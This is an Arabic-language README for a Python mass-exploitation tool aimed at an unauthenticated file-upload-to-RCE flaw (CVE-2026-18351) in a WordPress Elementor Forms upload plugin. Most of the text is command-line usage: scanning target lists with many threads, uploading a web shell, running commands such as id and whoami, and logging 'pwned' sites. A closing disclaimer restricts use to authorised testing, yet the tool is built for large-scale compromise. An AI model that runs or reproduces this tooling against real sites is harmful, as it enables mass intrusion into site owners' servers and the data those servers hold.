أداة استغلال جماعي لـ CVE-2026-18351، وهي ثغرة رفع ملفات عشوائية بدون مصادقة تؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) في Elementor Forms <= 1.6.0، مع الفحص السلبي، ورفع shell، وتنفيذ الأوامر.
أداة استغلال جماعي لـ CVE-2026-18351 — رفع ملفات عشوائي بدون مصادقة ← تنفيذ أوامر عن بُعد (RCE) في Drag and Drop File Upload for Elementor Forms <= 1.6.0.
credit johenlastgen | telegram @johenlastgen | channel @jlgnetworkredirect
لا توجد تبعيات خارجية — يستخدم مكتبة Python القياسية فقط.
python3 --version # 3.6+
# Single target — passive check only (no upload)
python3 mass.py --url http://target.com --check
# Single target — exploit with default command (id)
python3 mass.py --url http://target.com --cmd id
# Single target — exploit with custom command
python3 mass.py --url http://target.com --cmd whoami
# Mass targets — passive check
python3 mass.py --list targets.txt --threads 50 --check
# Mass targets — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id
# Mass targets — exploit with timeout tuning
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami
# Save full log
python3 mass.py --list targets.txt --output results.txt
# Save only vulnerable targets
python3 mass.py --list targets.txt --output-vuln vuln.txt
# Save only confirmed RCE targets
python3 mass.py --list targets.txt --output-pwned pwned.txt
# Combined output
python3 mass.py \
--list targets.txt \
--threads 50 \
--cmd id \
--output results.txt \
--output-vuln vuln.txt \
--output-pwned pwned.txt
| الخيار | الوصف |
|---|---|
--url | رابط هدف واحد |
--list FILE | ملف يحتوي على روابط الأهداف (رابط واحد في كل سطر) |
--check | فحص سلبي فقط — بدون رفع ملفات |
--cmd CMD | الأمر المراد تنفيذه على الـ shell (الافتراضي: id) |
--threads N | عدد الخيوط المتزامنة (الافتراضي: 20) |
--timeout N | مهلة كل طلب بالثواني (الافتراضي: 10) |
--output FILE | حفظ السجل الكامل في ملف |
--output-vuln FILE | حفظ روابط الأهداف المصابة فقط في ملف |
--output-pwned FILE | حفظ الأهداف المؤكد اختراقها (RCE) فقط في ملف |
| الحالة | المعنى |
|---|---|
PWNED | تم رفع الـ shell وتأكيد RCE |
VULN-NO-EXEC | تم قبول الرفع لكن فشل تنفيذ الـ shell |
PATCHED | تم رفض الرفع أو لم يتم العثور على nonce |
ERROR | فشل في الشبكة أو التحليل |
رابط واحد في كل سطر. يتم تجاهل الأسطر التي تبدأ بـ #.
http://target1.com
https://target2.com
# this line is ignored
http://target3.com
يُقدَّم هذا المشروع فقط لتقييمات الأمان المصرَّح بها، وأبحاث الأمان الدفاعي، والتحقق من الثغرات.
باستخدامك هذا البرنامج، فإنك تؤكد أن لديك تصريحًا صريحًا لتقييم الأنظمة المستهدفة. الوصول غير المصرَّح به إلى أنظمة الحاسوب محظور وقد ينتهك القوانين المعمول بها.
لا يشجع المؤلف والمساهمون الاستخدام غير المصرَّح به لهذا المشروع ولا يوافقون عليه، ولا يتحملون أي مسؤولية أو التزام عن أي إساءة استخدام أو ضرر أو عواقب قانونية ناتجة عن استخدامه.
JohenLastGen — JLG NETWORK